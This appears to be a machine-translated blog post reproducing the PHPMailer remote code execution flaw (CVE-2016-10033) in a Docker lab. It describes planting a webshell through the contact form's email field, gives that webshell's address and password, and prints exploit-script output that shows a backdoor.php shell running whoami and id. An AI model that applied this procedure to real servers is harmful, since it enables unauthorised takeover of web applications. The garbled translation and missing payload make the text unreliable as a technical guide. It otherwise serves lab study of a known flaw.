PHPMailer remote command execution vulnerability reappears
I. Introduction of vulnerabilities
PHPMailer is a PHP email creation and delivery class for multiple open source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! And so on.
PHPMailer < 5.2.18 has a security vulnerability that allows an unauthenticated remote attacker to execute arbitrary code in the context of a Web server user to remotely control a target Web application.
Ii. Impact Version:
PHPMailer < 5.2.18
Third, vulnerability recurrence
Docker environment:
dockerrun –rm -it -p8080:80vulnerables/cve-2016-10033
Pull image boot environment:
http://192.168.1.107:8080/
http://192.168.1.107:8080/, simply type in the name place such as “aaa”, in the email input:
Upload a word Trojan, the page will respond 3-5 minutes, the response time is long
Trojan address: http://192.168.1.107:8080/a.php password: thelostworld
Virtual terminal:
Using scripts:
Obtaining scripts The background replies to PHPMailer to obtain scripts
➜ Desktop. / exploits. Sh192.168.1.107:8080 [+] exploitbyopsxcq CVE – 2016-10033 [+] Exploiting192.168.1.107:8080 [+] Target exploited, Acessing shell at http://192.168.1.107:8080/backdoor.php [+] Checkingifthe backdoor was createdontarget system [+] Backdoor.php foundonremote system[+] Running whoamiwww-dataRemoteShell> [+] Running RemoteShell> id[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)
Access Trojan address:
http://192.168.1.107:8080/backdoor.php
Reference:
www.cnblogs.com/Hi-blog/p/7…
www.exploit-db.com/exploits/40…
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…
Personal CSDN: blog.csdn.net/qq_37602797…
Personal blog garden: www.cnblogs.com/thelostworl…
FREEBUF homepage: www.freebuf.com/author/thel…
Welcome to add the author of this public account to communicate on wechat. Please note the “public account” when adding.